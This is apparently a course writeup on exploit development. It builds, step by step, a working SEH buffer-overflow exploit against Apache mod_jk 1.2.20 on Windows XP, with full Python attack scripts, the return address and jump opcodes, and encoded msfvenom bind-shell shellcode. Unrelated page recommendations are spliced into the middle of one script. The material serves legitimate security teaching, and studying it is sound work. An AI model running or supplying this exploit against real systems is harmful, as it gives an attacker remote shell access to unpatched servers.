登录查看更多内容

Exploit Development Space Issues: A Relative Jump

Georgia Weidman

Founder @ Shevirah and Bulb Security, vCISO & Advisor, Author: Penetration Testing: A Hands-On Introduction to Hacking, Adjunct Faculty @ UMGC, SCSU, & Purdue Global

发布日期: 2024年6月13日

Note: These are writeups for the exercise for a previous version of my Exploit Development class that I’m not releasing for free. They assume that you have read Chapters 16–19 of Penetration Testing: A Hands-On Introduction to Hacking Version 1 or equivalent.

So far we have had plenty of room for our shellcode after the SEH overwrite or at a register, but this will not always be the case. Many exploit developers go straight for the egghunter (discussed in the next post), but in some cases it may not be necessary. In this example we will use a simpler technique known as a relative jump (or long jump) to get to our shellcode.

For this example we will attack vulnerability in an outdated Apache mod_jk 1.2.20 plugin on the Windows XP system (if you can’t find a copy of XP or the vulnerable software contact me and I’ll send you the book repo with the trials). As with our last few examples, we will be attacking the vulnerable service over the network from Kali. The exploit skeleton (modjkskel.py) is shown below.

#!/usr/bin/python

import socket

import sys

ip = sys.argv[1]

port = int(sys.argv[2])

exploitstring = “A” * 5000

buffer = “GET /” + exploitstring + “.html/1.0\r\n\r\n”

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((ip,port))

s.send(buffer)

Basically we are just sending a HTTP GET request for a long page name. Another thing to note is that this time the skeleton takes the IP address and port of the target as arguments. This is perhaps a better way of doing things than hardcoding these values as we have so far. Remember to include these values when you call the script.

Of course, we need to first connect to the process in Immunity Debugger. You will notice there are two Apache processes running. We actually want to attach to the one that is not listening on port 80 as shown in the figure below.

Run the exploit skeleton

./modjkskel.py 10.0.0.46 80

We get an access violation when executing the instruction

6A6C73F3 880411 MOV BYTE PTR DS:[ECX+EDX],AL.

The program is unable to write to 04390000. Based on the instruction, this should be the sum of ECX and EDX. AL is the lowest 8 bits of EAX, but since this is a write error rather than a read error, it shouldn’t matter.

As usual as we build our exploit we should ensure that we do not effect or lose the crash based on our input. We currently have control of SEH as shown in the figure below.

Now we need to use our cyclic pattern as usual. But the process does not like to restart nicely in Immunity Debugger. Detach and restart the process using the toolbar in the bottom right hand corner as shown below.

Now reattach in Immunity. Create the cyclic pattern with Mona.py as usual.

!mona pattern_create 5000

Replace the 5000 A’s in the exploit skeleton with the output.

#!/usr/bin/python

import socket

import sys

ip = sys.argv[1]

port = int(sys.argv[2])

#exploitstring = “A” * 5000

exploitstring = “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk”

buffer = “GET /” + exploitstring + “.html/1.0\r\n\r\n”

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((ip,port))

s.send(buffer)

Send the exploit again. Note that the program crashed at the same instruction but the values of ECX and EDX have changed. As long as their sum is not a writeable memory location we should be able to maintain the crash.

EDX (0x008a0660) points at offset 4495 in normal pattern (length 505)

Now use !mona findmsp to find our SEH overwrite.

[+] Examining SEH chain

SEH record (nseh field) at 0x0464ffa4 overwritten with normal pattern : 0x38714637 (offset 4403), followed by 84 bytes of cyclic data after the handler

I imagine you can already see our problem. We only have 84 bytes of space for our shellcode after the SEH overwrite. Clearly our previous method of short jump to shellcode is not going to work here.

Let’s go ahead and verify our offsets as usual and deal with that problem when we come to it. Restart the program and replace the cyclic pattern with a new string to verify the offsets from findmsp.

#!/usr/bin/python

import socket

import sys

ip = sys.argv[1]

port = int(sys.argv[2])

#exploitstring = “A” * 5000

length = 5000

firstpart = “A” * 4403

nseh = “B” * 4

seh = “C” * 4

exploitstring = firstpart + nseh + seh

exploitstring += “D” * (length — len(exploitstring))

buffer = “GET /” + exploitstring + “.html/1.0\r\n\r\n”

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((ip,port))

s.send(buffer)

As shown in the figure below our offsets line up as expected. NSEH is overwritten with B’s and the SEH handler is overwritten with C’s.

Pass the exception with Shift+F9. We see that as expected NSEH is at ESP+8.

If we follow ESP+8 on the stack we see our D’s which appear to be running off the end of the stack.

If we scroll up we see our A’s before NSEH. In fact all 4403 A’s are present in memory. We could use a short jump to jump back into our A’s. However, we are limited in how far we can jump using a short jump.

Open up Metasm in Kali from /usr/share/metasploit-framework/tools. As shown below if we try to jump backwards from our current location more than 123 bytes instead of our 2 byte short jump beginning with \xeb we instead end up with a five byte jump starting with \xe9. This is of course too big to fit in our 4 byte NSEH. There’s nothing to stop us from first taking the normal short jump (forward or backwards will work as we have 4403 bytes for our shellcode) then once we have more space to work with taking a second jump, this time the longer relative jump.

metasm > jmp $-123

“\xeb\x83”

metasm > jmp $-124

“\xe9\x7f\xff\xff\xff”

But we are getting a bit ahead of ourselves. Let’s get our POP/POP/RET and short jump in place as we covered previously before worrying about the relative jump. Before choosing a POP/POP/RET we should check for bad characters. We learned how to find bad characters in a previous post, and time permitting you can run through the process here as well, but for reference the bad characters for this example are shown below.

Badchars = “\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c”

We can use this list when using Mona.py to find POP/POP/RET candidates for our SEH overwrite.

!mona seh –cpb ‘\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c’

We can choose the first candidate from Mona.py’s output: 0x6eec6317 and replace our C’s in the previous exploit with this memory address in little endian format. While we are here we can replace NSEH with our short jump as well.

#!/usr/bin/python

import socket

import sys

ip = sys.argv[1]

port = int(sys.argv[2])

#exploitstring = “A” * 5000

length = 5000

firstpart = “A” * 4403

nseh = “\xeb\x06\x41\x41”

seh = “\x17\x63\xec\x6e”

exploitstring = firstpart + nseh + seh

exploitstring += “D” * (length — len(exploitstring))

buffer = “GET /” + exploitstring + “.html/1.0\r\n\r\n”

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((ip,port))

s.send(buffer)

Put a breakpoint on the POP/POP/RET in SEH with F2 before passing the exception. Use F7 to move through the POP/POP/RET and the short jump to land at the beginning of the D’s.

Now we can add in a relative jump at the beginning of our D’s to take us back to our A’s. Even with our bad characters 4403 characters should be enough space for any payload we like. We can use Metasm to get the correct opcode to jump back to the beginning of our A’s. Keep in mind that we need to account for NSEH and SEH as well, taking us back 4403+8= 4411 bytes.

metasm > jmp $-4411

“\xe9\xc0\xee\xff\xff”

This does not contain any bad characters so jumping to the beginning of the attack string will work fine in this case (had there been a bad character we would need to adjust how far we jumped accordingly).

#!/usr/bin/python

import socket

领英推荐

Kali Linux 2024.3 Released: 11 New Hacking Tools…

The Cyber Security Hub? 5 个月前

Hackers Hijack GitHub Accounts in Supply Chain Attack…

Cyberyami 11 个月前

What Happened Over the Week? | CVEs Edition

BRANDEFENSE 3 个月前

import sys

ip = sys.argv[1]

port = int(sys.argv[2])

#exploitstring = “A” * 5000

length = 5000

firstpart = “A” * 4403

nseh = “\xeb\x06\x41\x41”

seh = “\x17\x63\xec\x6e”

exploitstring = firstpart + nseh + seh

exploitstring += “\xe9\xc0\xee\xff\xff”

exploitstring += “D” * (length — len(exploitstring))

buffer = “GET /” + exploitstring + “.html/1.0\r\n\r\n”

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((ip,port))

s.send(buffer)

The addition of the relative jump does indeed bring us exactly to the beginning of our attack string as shown below.

Now we just need to add some shellcode. With the help of our relative jump we now have plenty of space for any payload we would like. Don’t forget to avoid the bad characters.

msfvenom -p windows/shell_bind_tcp -b ‘\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c’ -s 4403 -f py

[-] x86/shikata_ga_nai failed: Msf::BadcharError : Encoding failed due to a bad character (index=264, char=0x0d)

[-] x86/countdown failed: Msf::BadcharError : Encoding failed due to a bad character (index=357, char=0x00)

[-] generic/none failed: Msf::BadcharError : Encoding failed due to a bad character (index=3, char=0x00)

[-] x86/jmp_call_additive failed: Msf::BadcharError : Encoding failed due to a bad character (index=7, char=0x0c)

[*] x86/call4_dword_xor succeeded with size 368 (iteration=1)

buf = “”

buf += “\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81”

buf += “\x76\x0e\xb1\x9a\x90\x8d\x83\xee\xfc\xe2\xf4\x4d\x72”

buf += “\x19\x8d\xb1\x9a\xf0\x04\x54\xab\x42\xe9\x3a\xc8\xa0”

buf += “\x06\xe3\x96\x1b\xdf\xa5\x11\xe2\xa5\xbe\x2d\xda\xab”

buf += “\x80\x65\xa1\x4d\x1d\xa6\xf1\xf1\xb3\xb6\xb0\x4c\x7e”

buf += “\x97\x91\x4a\x53\x6a\xc2\xda\x3a\xc8\x80\x06\xf3\xa6”

buf += “\x91\x5d\x3a\xda\xe8\x08\x71\xee\xda\x8c\x61\xca\x1b”

buf += “\xc5\xa9\x11\xc8\xad\xb0\x49\x73\xb1\xf8\x11\xa4\x06”

buf += “\xb0\x4c\xa1\x72\x80\x5a\x3c\x4c\x7e\x97\x91\x4a\x89”

buf += “\x7a\xe5\x79\xb2\xe7\x68\xb6\xcc\xbe\xe5\x6f\xe9\x11”

buf += “\xc8\xa9\xb0\x49\xf6\x06\xbd\xd1\x1b\xd5\xad\x9b\x43”

buf += “\x06\xb5\x11\x91\x5d\x38\xde\xb4\xa9\xea\xc1\xf1\xd4”

buf += “\xeb\xcb\x6f\x6d\xe9\xc5\xca\x06\xa3\x71\x16\xd0\xd9”

buf += “\xa9\xa2\x8d\xb1\xf2\xe7\xfe\x83\xc5\xc4\xe5\xfd\xed”

buf += “\xb6\x8a\x4e\x4f\x28\x1d\xb0\x9a\x90\xa4\x75\xce\xc0”

buf += “\xe5\x98\x1a\xfb\x8d\x4e\x4f\xc0\xdd\xe1\xca\xd0\xdd”

buf += “\xf1\xca\xf8\x67\xbe\x45\x70\x72\x64\x13\x57\xbc\x6a”

buf += “\xc9\xf8\x8f\xb1\x8b\xcc\x04\x57\xf0\x80\xdb\xe6\xf2”

buf += “\x52\x56\x86\xfd\x6f\x58\xe2\xcd\xf8\x3a\x58\xa2\x6f”

buf += “\x72\x64\xc9\xc3\xda\xd9\xee\x7c\xb6\x50\x65\x45\xda”

buf += “\x38\x5d\xf8\xf8\xdf\xd7\xf1\x72\x64\xf2\xf3\xe0\xd5”

buf += “\x9a\x19\x6e\xe6\xcd\xc7\xbc\x47\xf0\x82\xd4\xe7\x78”

buf += “\x6d\xeb\x76\xde\xb4\xb1\xb0\x9b\x1d\xc9\x95\x8a\x56”

buf += “\x8d\xf5\xce\xc0\xdb\xe7\xcc\xd6\xdb\xff\xcc\xc6\xde”

buf += “\xe7\xf2\xe9\x41\x8e\x1c\x6f\x58\x38\x7a\xde\xdb\xf7”

buf += “\x65\xa0\xe5\xb9\x1d\x8d\xed\x4e\x4f\x2b\x7d\x04\x38”

buf += “\xc6\xe5\x17\x0f\x2d\x10\x4e\x4f\xac\x8b\xcd\x90\x10”

buf += “\x76\x51\xef\x95\x36\xf6\x89\xe2\xe2\xdb\x9a\xc3\x72”

buf += “\x64\x9a\x90\x8d”

Prepending this shellcode to the beginning of our exploit string gets us a bind shell when we run the exploit.